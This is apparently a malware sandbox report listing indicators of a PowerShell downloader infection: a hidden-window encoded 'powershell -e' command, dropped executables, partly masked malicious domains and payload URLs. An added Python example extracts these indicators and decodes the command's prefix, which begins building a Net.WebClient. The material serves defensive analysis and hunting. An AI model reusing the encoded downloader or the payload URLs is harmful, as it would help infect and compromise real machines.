Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABhAEEAQwBrADQAQQBEAGMAPQAoACcAawAnACsAJwB4AEIARABBACcAKwAnAEEAWAAnACkAOwAkAGgAQQBBAFEAUQAxAEEAQgA9AC4AKAAnAG4AJwArACcAZQAnACsAJwB3AC0AbwBiAGoAZQBjAHQAJwApACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1548
- %TEMP%\1132536.cvr
- %HOMEPATH%\392.exe
- 'ch####ngiovi.com':80
- 'ac###ytech.ca':443
- 'si#####esponsive.com':80
- 'de###ndunn.com':443
- 'si###atural.com':80
- http://ch####ngiovi.com/wp/O9I/
- http://si#####esponsive.com/samples/Vxfk/
- http://si###atural.com/tmp/kCK/
- http://si###atural.com/cgi-sys/suspendedpage.cgi
- 'ac###ytech.ca':443
- 'de###ndunn.com':443
- DNS ASK ca###asas.com
- DNS ASK ch####ngiovi.com
- DNS ASK ac###ytech.ca
- DNS ASK si#####esponsive.com
- DNS ASK de###ndunn.com
- DNS ASK si###atural.com
- DNS ASK he######yconjurodeamor.info
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABhAEEAQwBrADQAQQBEAGMAPQAoACcAawAnACsAJwB4AEIARABBACcAKwAnAEEAWAAnACkAOwAkAGgAQQBBAFEAUQAxAEEAQgA9AC4AKAAnAG4AJwArACcAZQAnACsAJwB3AC0AbwBiAGoAZQBjAHQAJwApACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG...' (with hidden window)
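The indicator list above mixes launched processes, dropped files, TCP connections, requested URLs and DNS queries, and the PowerShell launch hides its script behind `-e` (a prefix of `-EncodedCommand`: base64 over UTF-16LE text). As an added worked example, not part of the original report, the Python below sorts such bullet items into IOC classes, decodes the truncated `-e` blob as far as it goes, and collapses the `('n'+'e'+'w-object')` string splicing so the downloader call becomes readable. The sample `REPORT` is constructed from a subset of the lines above; the regexes and function names are this example's own assumptions, not anything from the report or the vendor's tooling.

```python
import base64
import re

# Constructed sample for this example: a subset of the indicator list above.
# The -e blob is cut off exactly where the report cuts it ("..."); nothing
# past that point is known, so the decoder only recovers the visible prefix.
REPORT = r"""
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABhAEEAQwBrADQAQQBEAGMAPQAoACcAawAnACsAJwB4AEIARABBACcAKwAnAEEAWAAnACkAOwAkAGgAQQBBAFEAUQAxAEEAQgA9AC4AKAAnAG4AJwArACcAZQAnACsAJwB3AC0AbwBiAGoAZQBjAHQAJwApACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1548
- %TEMP%\1132536.cvr
- %HOMEPATH%\392.exe
- %HOMEPATH%\392.exe
- 'ch####ngiovi.com':80
- 'ac###ytech.ca':443
- http://ch####ngiovi.com/wp/O9I/
- http://si###atural.com/cgi-sys/suspendedpage.cgi
- DNS ASK ch####ngiovi.com
- DNS ASK he######yconjurodeamor.info
"""

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED_ARG = re.compile(r"\s-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)", re.I)
CONNECT = re.compile(r"'([^']+)':(\d+)")                # 'host':port
PROCESS = re.compile(r"'[^']+\.exe'\s", re.I)           # quoted binary + arguments
STR_CONCAT = re.compile(r"\(\s*('[^']*'(?:\s*\+\s*'[^']*')+)\s*\)")  # ('a'+'b')
CALL_OP = re.compile(r"\.\s*'([^']*)'")                 # .'cmd'  ->  cmd


def decode_encoded_command(b64: str) -> str:
    """Decode a -EncodedCommand value: base64 over UTF-16LE text.

    A truncated blob is re-padded and a dangling odd byte is dropped, so a
    cut-off sample still yields its readable prefix instead of an exception.
    """
    b64 += "=" * (-len(b64) % 4)
    raw = base64.b64decode(b64)
    raw = raw[: len(raw) - len(raw) % 2]
    return raw.decode("utf-16-le")


def deobfuscate(script: str) -> str:
    """Collapse ('n'+'e'+'w-object') string splicing and the .'cmd' call operator."""
    def join(m):
        return "'" + "".join(re.findall(r"'([^']*)'", m.group(1))) + "'"
    return CALL_OP.sub(r"\1", STR_CONCAT.sub(join, script))


def extract_iocs(report: str) -> dict:
    """Sort the report's bullet items into IOC classes and decode any -e payload."""
    iocs = {k: set() for k in ("process", "file", "connect", "url", "dns")}
    decoded = []
    for line in report.splitlines():
        item = line.strip()
        if not item.startswith("- "):
            continue
        item = re.sub(r"\.\.\.$", "", item[2:])     # drop the report's truncation marker
        if item.startswith("DNS ASK "):
            iocs["dns"].add(item[len("DNS ASK "):])
        elif re.match(r"https?://", item):
            iocs["url"].add(item)
        elif (m := CONNECT.fullmatch(item)):
            iocs["connect"].add(f"{m[1]}:{m[2]}")
        elif PROCESS.match(item):
            iocs["process"].add(item)
            if (m := ENCODED_ARG.search(item)):
                decoded.append(deobfuscate(decode_encoded_command(m[1])))
        else:
            iocs["file"].add(item)                   # dropped/created file paths
    result = {k: sorted(v) for k, v in iocs.items()}
    result["decoded"] = decoded
    return result


if __name__ == "__main__":
    for kind, items in extract_iocs(REPORT).items():
        for entry in items:
            print(f"{kind:8} {entry}")
```

On the sample above the decoded prefix reads `$aACk4ADc='kxBDAAX';$hAAQQ1AB=new-object Net.WebClie`, i.e. the script assigns a random-looking variable and starts constructing a `Net.WebClient`, the usual shape of a download-and-execute stage; the rest of the command line is not on the page, so nothing beyond that is recovered. The same `decode_encoded_command` step applies to process-creation telemetry (Sysmon event 1, Windows 4688 with command-line auditing) when hunting for `powershell.exe -e` launches.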